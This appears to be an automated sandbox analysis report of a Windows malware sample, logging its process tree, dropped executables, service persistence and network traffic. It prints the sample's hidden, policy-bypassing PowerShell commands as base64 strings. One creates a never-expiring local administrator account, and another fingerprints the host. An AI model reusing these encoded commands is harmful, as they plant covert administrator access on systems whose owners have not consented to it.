HUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline"Jump to behavior
        Source: svczHost.exe.13.drStatic PE information: section name: .managed
        Source: svczHost.exe.13.drStatic PE information: section name: hydrated
        Source: myRdpService.exe.20.drStatic PE information: section name: .managed
        Source: myRdpService.exe.20.drStatic PE information: section name: hydrated
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C6B730 pushfd ; ret 2_2_00007FFC44C6B781
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C600BD pushad ; iretd 2_2_00007FFC44C600C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C610F4 push eax; ret 2_2_00007FFC44C610FB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C6841E push eax; ret 2_2_00007FFC44C6842D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C683EE pushad ; ret 2_2_00007FFC44C6841D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C61045 pushad ; iretd 2_2_00007FFC44C6105A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C61FB9 push ds; iretd 2_2_00007FFC44C61FBA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C67C1E push eax; retf 2_2_00007FFC44C67C2D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C60BF3 push ds; iretd 2_2_00007FFC44C60BFA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC44C67BEE pushad ; retf 2_2_00007FFC44C67C1D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44B4D2A5 pushad ; iretd 8_2_00007FFC44B4D2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44B4FC75 pushad ; iretd 8_2_00007FFC44B4FC77
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44C600BD pushad ; iretd 8_2_00007FFC44C600C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44C605EE pushad ; retf 8_2_00007FFC44C605ED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44C60580 pushad ; retf 8_2_00007FFC44C605ED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44C61FD2 push eax; iretd 8_2_00007FFC44C62009
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44C60BC5 push ds; iretd 8_2_00007FFC44C60BDA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFC44C61FAB push eax; iretd 8_2_00007FFC44C62009
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44B4D2A5 pushad ; iretd 13_2_00007FFC44B4D2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44B4FC75 pushad ; iretd 13_2_00007FFC44B4FC77
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44C600BD pushad ; iretd 13_2_00007FFC44C600C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44C610F4 push eax; ret 13_2_00007FFC44C610FB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44C60BF3 push ds; iretd 13_2_00007FFC44C60BFA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC44D3C420 push ebx; ret 13_2_00007FFC44D3C421
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFC45190D18 push eax; ret 13_2_00007FFC45190D19
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC44C9196D push E95F4C2Dh; ret 24_2_00007FFC44C91A19
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC44C90565 push ds; iretd 24_2_00007FFC44C9053A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC44C900BD pushad ; iretd 24_2_00007FFC44C900C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC44C90BC5 push ds; iretd 24_2_00007FFC44C90BDA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFC44C903C8 push ds; iretd 24_2_00007FFC44C9053A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFC44C57930 push ebx; retf 28_2_00007FFC44C5794A

        Persistence and Installation Behavior

        barindex
        Windows shortcut file (LNK) starts blacklisted processes
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.dllJump to dropped file
        Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 8008
        Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 8008
        Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49743
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
